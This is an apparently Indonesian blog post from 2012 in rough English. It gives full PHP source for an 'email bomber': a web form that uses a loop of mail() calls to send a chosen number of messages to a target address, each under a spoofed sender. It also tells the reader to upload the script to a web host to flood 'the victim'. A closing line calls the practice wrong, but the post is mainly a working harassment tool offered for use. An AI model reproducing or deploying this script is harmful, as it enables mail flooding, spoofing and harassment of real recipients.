Tuesday, July 3, 2012

Script BOM E-Mail PHP

0 comments
Share on :

I will discuss about how to send an email to the thousands just to send a one-time only. Here I use the email bomb script.

The following example program snippet:


<html>
<body>
<form method=post action=index.php>
<pre>
<input type=hidden value=ok name=ok>
From : <input name=dari value=”<? echo $dari;?>”>
To : <input name=kepada value=”<? echo $kepada;?>”>
Amount : <input name=jumlah value=”<? echo $jumlah;?>”>
Message: <textarea name=isi><?echo $isi?></textarea><br>
<input type=submit value=Booom>
</form></pre>
<?
if ($ok==”ok”)
{
for ($i=0;$i<$jumlah;$i++)
{
$a=$i.$dari;
mail($kepada,$isi,”",”From : $a <$a>”);
}
echo (“Beres Bos”);
}
?>
</body>
</html>
Then save the code in a file, for example email-bomber.php

Then enter the file in your webserver or webhosting.

The next step is open a browser and enter the address where you saved the file for example http://yourdomain.com/email-bomber.php

If the e-mail addresses that addressed right then it will automatically send email messages to the victim.

Last message should not be done because God is omniscient and ask if there is one word in excuse.



Jika Anda menyukai Artikel di blog ini, Silahkan klik disini untuk berlangganan gratis via email, dengan begitu Anda akan mendapat kiriman artikel setiap ada artikel yang terbit di CBM

Leave a Reply